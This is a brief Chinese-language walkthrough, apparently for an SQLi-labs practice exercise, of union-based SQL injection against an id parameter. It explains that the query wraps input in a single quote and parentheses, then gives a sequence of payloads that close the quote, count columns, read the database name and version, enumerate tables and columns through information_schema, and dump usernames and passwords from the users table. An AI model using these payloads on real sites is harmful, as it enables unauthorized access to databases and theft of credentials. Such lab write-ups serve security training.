1.试探?id=1。显然有回显了,那麽知道有注入点。
2.输入?id=1',回显的是for the right syntax to use near ''1'') LIMIT 0,1' at line 1
3.可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。
4.
?id=2')--+
?id=1') order by 3--+
?id=-1') union select 1,2,3--+
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+